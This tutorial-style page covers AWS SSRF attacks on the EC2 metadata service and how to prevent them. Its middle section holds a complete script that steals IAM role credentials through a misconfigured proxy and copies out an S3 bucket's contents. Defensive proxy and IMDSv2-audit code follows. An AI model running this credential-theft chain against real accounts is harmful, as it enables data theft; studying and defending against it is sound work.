👨‍🔬Exploiting AWS Misconfigurations

Basic AWS Services

  • VPC - Virtual Private Cloud

    • Logical data center in AWS: an isolated network you define

  • EC2 - Elastic Compute Cloud

    • Runs instances that are similar to VMs

  • S3 - Simple Storage Service

    • Object storage organized into buckets

  • IAM - Identity and Access Management

    • How AWS provisions access: users, roles and the policies attached to them

The Problem

The problem arises from an EC2 "feature", the Instance Metadata Service (IMDS, reachable from the instance at 169.254.169.254), combined with an attack known as Server-Side Request Forgery (SSRF): the attacker makes the server send an HTTP request of the attacker's choosing, so a request the attacker could never send from the internet is made from inside the instance, where IMDS answers it.

Tool

Setup

  • Nginx running on AWS EC2

  • S3 Buckets with sensitive data

  • IAM Roles with read access to S3 buckets

  • Instance Profile with IAM Roles attached to EC2 instance

Misconfiguration

The proxy server should be able to retrieve content from the web application server and nothing else. Misconfigured, it forwards requests to whatever host the client names (in the request line or the Host header), including the Instance Metadata Service at 169.254.169.254, which only the instance itself should ever talk to.
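The misconfiguration and its fix side by side, as an added example that is not the page's nginx configuration. The two `pick_upstream` policies stand in for an nginx `proxy_pass http://$host$request_uri;` (forward to the client-named host) versus `proxy_pass http://app_backend;` (pinned upstream); the address in `APP_UPSTREAM` and the port are assumptions. The `target_allowed` check is defence in depth that refuses IMDS, link-local and loopback destinations even if the upstream policy is loosened later.

```python
"""Open forwarding proxy versus a pinned upstream (added example).

Not the page's nginx config. upstream_vulnerable() models
`proxy_pass http://$host$request_uri`, upstream_hardened() models
`proxy_pass http://app_backend`. APP_UPSTREAM is an assumed address.
"""
import ipaddress
import socket
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.error import HTTPError, URLError
from urllib.parse import urlsplit
from urllib.request import Request, urlopen

APP_UPSTREAM = "10.0.1.5:8080"  # assumed address of the only legitimate backend

# Networks a front-end proxy must never forward to: IPv4 link-local
# (IMDS lives at 169.254.169.254), the IPv6 IMDS endpoint, and loopback.
DENIED_NETWORKS = [
    ipaddress.ip_network("169.254.0.0/16"),
    ipaddress.ip_network("fd00:ec2::254/128"),
    ipaddress.ip_network("127.0.0.0/8"),
    ipaddress.ip_network("::1/128"),
]


def upstream_vulnerable(host_header):
    """Misconfiguration: forward to whatever host the client put in Host."""
    return host_header


def upstream_hardened(host_header):
    """Fix: the client-supplied Host is ignored; every request goes to the app."""
    return APP_UPSTREAM


def target_allowed(target):
    """Resolve the upstream and refuse denied networks.

    Returns False for IMDS/link-local/loopback addresses, for an empty
    target, and for names that do not resolve (fail closed).
    """
    hostname = urlsplit("//" + target).hostname  # strips port and [] brackets
    if not hostname:
        return False
    try:
        addresses = [ipaddress.ip_address(hostname)]
    except ValueError:  # not a literal: resolve it
        try:
            infos = socket.getaddrinfo(hostname, None)
        except socket.gaierror:
            return False
        addresses = [ipaddress.ip_address(info[4][0].split("%")[0]) for info in infos]
    return not any(addr in net for addr in addresses for net in DENIED_NETWORKS)


class ForwardingProxy(BaseHTTPRequestHandler):
    """Minimal GET-only reverse proxy; swap pick_upstream to change policy."""
    pick_upstream = staticmethod(upstream_vulnerable)

    def do_GET(self):
        target = self.pick_upstream(self.headers.get("Host", ""))
        if not target_allowed(target):
            self.send_error(403, "upstream not allowed")
            return
        try:
            with urlopen(Request("http://%s%s" % (target, self.path)), timeout=3) as resp:
                status, body = resp.status, resp.read()
        except HTTPError as err:
            status, body = err.code, err.read()
        except URLError:
            self.send_error(502, "upstream unreachable")
            return
        self.send_response(status)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(body)


class HardenedProxy(ForwardingProxy):
    """Same proxy with the upstream pinned to the application tier."""
    pick_upstream = staticmethod(upstream_hardened)


if __name__ == "__main__":
    # Run the fixed proxy locally: a request carrying Host: 169.254.169.254
    # now lands on APP_UPSTREAM instead of the metadata service.
    HTTPServer(("127.0.0.1", 8080), HardenedProxy).serve_forever()
```

With `ForwardingProxy` (the vulnerable policy) a request such as `curl -H 'Host: 169.254.169.254' http://proxy/latest/meta-data/` is only stopped by `target_allowed`; with `HardenedProxy` the Host header never influences where the request goes, which is the actual fix.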

The attack

  • Discover a proxy server that can be made to reach the Instance Metadata Service

  • Craft a request to the web server that makes it return data from the Instance Metadata Service, for example

  • http://169.254.169.254/latest/meta-data/iam/security-credentials/ISRM-WAF-Role

  • This returns temporary credentials (access key, secret key and session token) that can be used to access any resource the IAM role is allowed to reach

Get Meta-Data

  • View the directories: request /latest/ through the proxy

  • View the meta-data directory: /latest/meta-data/

  • View the iam directory: /latest/meta-data/iam/security-credentials/ lists the attached role names, and requesting a role name returns its AccessKeyId, SecretAccessKey and Token

  • View the buckets using the leaked creds: export all three values (the session token is required, these are temporary credentials) and list the buckets

  • List bucket objects

  • Get encryption details for the bucket

  • Sync the bucket objects to the laptop
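The attack chain above as one script, added here as an example and not the page's own tooling. It assumes a hypothetical misconfigured proxy (`PROXY`) that forwards to the host named in the Host header; the role name ISRM-WAF-Role is the page's, `SAMPLE_CREDS` is a constructed IMDS response with made-up keys, and `LOOT_BUCKET` is an assumed bucket name. The bucket steps need boto3 and are the SDK equivalent of `aws s3 ls`, `aws s3api get-bucket-encryption` and `aws s3 sync`.

```python
"""SSRF-to-S3 credential theft chain (added example, not the page's code).

PROXY is an assumed misconfigured front end that forwards to whatever
host the Host header names. SAMPLE_CREDS is a constructed IMDSv1 reply.
"""
import json
import os
import urllib.request

IMDS_HOST = "169.254.169.254"
ROLE_PATH = "/latest/meta-data/iam/security-credentials/"
PROXY = os.environ.get("PROXY", "http://proxy.example.com")          # assumed
LOOT_BUCKET = os.environ.get("LOOT_BUCKET", "example-sensitive-bucket")  # assumed

# Constructed sample of what IMDSv1 returns for a role; the keys are not real.
SAMPLE_CREDS = """{
  "Code" : "Success",
  "LastUpdated" : "2019-07-19T12:00:00Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIAEXAMPLE00000000",
  "SecretAccessKey" : "example-secret-access-key-not-real",
  "Token" : "example-session-token-not-real",
  "Expiration" : "2019-07-19T18:00:00Z"
}"""


def build_ssrf_request(proxy, imds_path):
    """The crafted request: the proxy receives it, but the Host header makes
    it forward to the metadata service instead of the application."""
    return urllib.request.Request(proxy.rstrip("/") + imds_path,
                                  headers={"Host": IMDS_HOST})


def fetch_via_proxy(proxy, imds_path):
    with urllib.request.urlopen(build_ssrf_request(proxy, imds_path), timeout=5) as resp:
        return resp.read().decode()


def list_roles(proxy):
    """View the iam directory: IMDS returns one attached role name per line."""
    return fetch_via_proxy(proxy, ROLE_PATH).split()


def parse_credentials(text):
    """Turn the IMDS credential document into AWS CLI/SDK environment variables."""
    doc = json.loads(text)
    if doc.get("Code") != "Success":
        raise ValueError("metadata service returned no credentials: %r" % doc.get("Code"))
    return {
        "AWS_ACCESS_KEY_ID": doc["AccessKeyId"],
        "AWS_SECRET_ACCESS_KEY": doc["SecretAccessKey"],
        "AWS_SESSION_TOKEN": doc["Token"],  # temporary creds are useless without it
        "AWS_CREDENTIAL_EXPIRATION": doc["Expiration"],
    }


def steal_credentials(proxy, role):
    return parse_credentials(fetch_via_proxy(proxy, ROLE_PATH + role))


def loot_bucket(env, bucket, dest="./loot"):
    """List objects, read the encryption config and download everything
    with the leaked role credentials (requires boto3)."""
    import boto3  # imported here so the rest of the script runs without the SDK
    s3 = boto3.client("s3",
                      aws_access_key_id=env["AWS_ACCESS_KEY_ID"],
                      aws_secret_access_key=env["AWS_SECRET_ACCESS_KEY"],
                      aws_session_token=env["AWS_SESSION_TOKEN"])
    keys = [obj["Key"]
            for page in s3.get_paginator("list_objects_v2").paginate(Bucket=bucket)
            for obj in page.get("Contents", [])]
    print("%d objects in %s" % (len(keys), bucket))
    try:
        print("encryption:", s3.get_bucket_encryption(Bucket=bucket)
              ["ServerSideEncryptionConfiguration"]["Rules"])
    except Exception as err:  # no default encryption configured
        print("encryption: none (%s)" % err)
    for key in keys:
        if key.endswith("/"):
            continue
        path = os.path.join(dest, key)
        os.makedirs(os.path.dirname(path) or dest, exist_ok=True)
        s3.download_file(bucket, key, path)
    return keys


if __name__ == "__main__":
    for role in list_roles(PROXY):
        env = steal_credentials(PROXY, role)
        print(role, "credentials expire", env["AWS_CREDENTIAL_EXPIRATION"])
        loot_bucket(env, LOOT_BUCKET)
```

Note that `parse_credentials` carries the session token through: the most common mistake when reusing metadata credentials is exporting only the key pair, which fails with an invalid-token error because these are STS temporary credentials, not long-lived user keys.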

Prevention

  • Use least privilege when creating IAM roles: scope the role to the specific buckets and actions the instance needs, so stolen credentials reach as little as possible

  • If the workload does not need the Instance Metadata Service, block 169.254.169.254 with a host firewall; if it does (any instance that uses an instance profile does), require IMDSv2, which needs a PUT request with a token TTL header before credentials are served, and set the hop limit to 1 so a request forwarded through a proxy or container cannot reach it. The plain GET used in the attack above then gets an HTTP 401 instead of keys

  • Do not store sensitive data in your provisioning scripts (user data): they are readable from the same service at /latest/user-data
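An audit-and-remediate script for the second prevention bullet, added as an example that is not from the page. `imds_findings` runs over the shape EC2 DescribeInstances returns (`SAMPLE_RESERVATIONS` is a constructed sample; the instance IDs, account ID and profile ARNs are made up), and `enforce_imdsv2` uses the boto3 call ModifyInstanceMetadataOptions, which needs AWS credentials and therefore only runs from `main`.

```python
"""Find instances whose metadata options still hand credentials to an SSRF,
and switch them to IMDSv2 (added example, not the page's tooling).

SAMPLE_RESERVATIONS is a constructed DescribeInstances payload.
"""

SAMPLE_RESERVATIONS = [{"Instances": [
    {"InstanceId": "i-0aaa111bbb222ccc3",  # constructed: IMDSv1 + role + hop limit 2
     "IamInstanceProfile": {"Arn": "arn:aws:iam::123456789012:instance-profile/ISRM-WAF-Role"},
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "optional",
                         "HttpPutResponseHopLimit": 2}},
    {"InstanceId": "i-0ddd444eee555fff6",  # constructed: already hardened
     "IamInstanceProfile": {"Arn": "arn:aws:iam::123456789012:instance-profile/app-role"},
     "MetadataOptions": {"HttpEndpoint": "enabled", "HttpTokens": "required",
                         "HttpPutResponseHopLimit": 1}},
    {"InstanceId": "i-0ggg777hhh888iii9",  # constructed: IMDS disabled entirely
     "MetadataOptions": {"HttpEndpoint": "disabled", "HttpTokens": "optional",
                         "HttpPutResponseHopLimit": 1}},
]}]


def imds_findings(reservations):
    """Return a list of {InstanceId, Severity, Issues} for instances where
    a forwarded plain GET could still reach role credentials."""
    findings = []
    for reservation in reservations:
        for inst in reservation.get("Instances", []):
            opts = inst.get("MetadataOptions", {})
            if opts.get("HttpEndpoint") == "disabled":
                continue  # nothing to steal: the service is off
            issues = []
            if opts.get("HttpTokens") != "required":
                issues.append("IMDSv1 allowed: a plain GET returns credentials")
            if opts.get("HttpPutResponseHopLimit", 1) > 1:
                issues.append("hop limit > 1: requests relayed through a proxy "
                              "or container on the host can reach IMDS")
            if issues:
                # Credentials only exist to steal when a profile is attached.
                severity = "high" if "IamInstanceProfile" in inst else "low"
                findings.append({"InstanceId": inst["InstanceId"],
                                 "Severity": severity, "Issues": issues})
    return findings


def enforce_imdsv2(ec2, instance_id):
    """Require session tokens and stop forwarded hops from reaching IMDS.
    After this, the attack's GET is answered with HTTP 401."""
    return ec2.modify_instance_metadata_options(
        InstanceId=instance_id,
        HttpTokens="required",
        HttpPutResponseHopLimit=1,
        HttpEndpoint="enabled",
    )


if __name__ == "__main__":
    import boto3
    ec2 = boto3.client("ec2")
    reservations = []
    for page in ec2.get_paginator("describe_instances").paginate():
        reservations.extend(page["Reservations"])
    for finding in imds_findings(reservations):
        print(finding)
        if finding["Severity"] == "high":
            enforce_imdsv2(ec2, finding["InstanceId"])
```

Before flipping `HttpTokens` to `required` fleet-wide, confirm the instance's own software (SDK versions, agents, anything that reads user data) already speaks IMDSv2; a client that cannot will lose its credentials at the same moment the attacker does.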
